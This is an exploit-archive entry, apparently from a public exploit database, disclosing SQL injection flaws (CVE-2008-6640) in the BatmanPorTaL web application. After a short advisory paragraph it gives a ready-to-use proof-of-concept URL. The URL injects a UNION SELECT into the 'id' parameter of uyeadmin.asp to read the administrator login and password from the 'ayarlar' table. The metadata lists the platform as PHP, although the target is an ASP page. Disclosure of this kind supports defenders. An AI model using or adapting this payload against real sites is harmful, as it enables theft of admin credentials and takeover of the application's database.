BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection

Author: U238
type: webapps
platform: php
port: 
date_added: 2008-05-05 
date_updated: 2014-02-19 
verified: 1 
codes: CVE-2008-6640;OSVDB-53394 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/29057/info

BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/lab/BatmanPorTaL/uyeadmin.asp?islem=uyeduzenle1&id=0+union+select+0,(admin_kd),2,1,(admin_pw),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar